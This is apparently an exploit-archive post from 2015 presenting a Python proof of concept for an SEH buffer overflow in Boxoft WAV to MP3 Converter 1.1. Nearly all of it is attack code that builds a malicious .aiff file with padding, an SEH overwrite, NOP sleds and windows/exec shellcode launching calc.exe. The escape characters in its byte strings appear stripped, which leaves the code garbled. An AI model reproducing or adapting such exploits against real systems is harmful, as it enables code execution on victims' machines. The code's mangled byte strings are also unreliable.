Boxoft WAV To MP3 COnverter 1.1 Buffer Overflow
Posted on 15 October 2015
# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow # Date: 10/13/2015 # Exploit Author: ArminCyber # Contact: Armin.Exploit@gmail.com # Version: 1.1 # Tested on: XP SP3 EN # Description: A malicious .aiff file cause this vulnerability. # category: Local Exploit f = open("malicious.aiff", "w") f.write("A"*4132) f.write("xebx06x90x90") f.write("xa4x43x40x00") # Shellcode: # windows/exec - 277 bytes # CMD=calc.exe f.write("x90"*20) f.write("xbaxd5x31x08x38xdbxcbxd9x74x24xf4x5bx29xc9xb1" "x33x83xc3x04x31x53x0ex03x86x3fxeaxcdxd4xa8x63" "x2dx24x29x14xa7xc1x18x06xd3x82x09x96x97xc6xa1" "x5dxf5xf2x32x13xd2xf5xf3x9ex04x38x03x2fx89x96" "xc7x31x75xe4x1bx92x44x27x6exd3x81x55x81x81x5a" "x12x30x36xeex66x89x37x20xedxb1x4fx45x31x45xfa" "x44x61xf6x71x0ex99x7cxddxafx98x51x3dx93xd3xde" "xf6x67xe2x36xc7x88xd5x76x84xb6xdax7axd4xffxdc" "x64xa3x0bx1fx18xb4xcfx62xc6x31xd2xc4x8dxe2x36" "xf5x42x74xbcxf9x2fxf2x9ax1dxb1xd7x90x19x3axd6" "x76xa8x78xfdx52xf1xdbx9cxc3x5fx8dxa1x14x07x72" "x04x5exa5x67x3ex3dxa3x76xb2x3bx8ax79xccx43xbc" "x11xfdxc8x53x65x02x1bx10x99x48x06x30x32x15xd2" "x01x5fxa6x08x45x66x25xb9x35x9dx35xc8x30xd9xf1" "x20x48x72x94x46xffx73xbdx24x9exe7x5dx85x05x80" "xc4xd9") f.write("x90"*20) f.close()
